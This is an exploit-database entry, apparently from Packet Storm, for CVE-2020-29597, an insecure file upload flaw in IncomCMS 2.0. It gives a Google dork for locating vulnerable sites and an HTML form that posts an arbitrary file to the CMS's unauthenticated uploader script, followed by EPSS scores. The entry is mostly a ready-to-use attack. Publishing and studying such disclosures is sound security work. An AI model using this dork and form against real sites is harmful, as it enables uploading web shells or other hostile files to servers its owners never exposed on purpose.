Incom CMS 2.0 File Upload

2021-01-0500:00:00

MoeAlBarbari

packetstormsecurity.com

565

insecure file upload

google dork

exploit

incomcms 2.0

vendor homepage

version 2.0

cve-2020-29597

multipart form data

script.php

EPSS

0.889

Percentile

98.8%

JSON

`# Exploit Title: IncomCMS 2.0 - Insecure File Upload  
# Google Dork: intext:"Incom CMS 2.0"  
# Date: 07.12.2020  
# Exploit Author: MoeAlBarbari  
# Vendor Homepage: https://www.incomcms.com/  
# Version: 2.0  
# Tested on: BackBox linux  
# CVE: CVE-2020-29597  
  
<!DOCTYPE html>  
<html>  
<head>  
<title>Upload your files</title>  
</head>  
<body>  
<form enctype="multipart/form-data" action="http://www.example.com/incom/modules/uploader/showcase/script.php" method="POST">  
<p>Upload your file</p>  
<input type="file" name="Filedata"></input><br />  
<input type="submit" value="Upload"></input>  
</form>  
</body>  
</html>  
  
`

EPSS

0.889

Percentile

98.8%

JSON

Related for PACKETSTORM:160784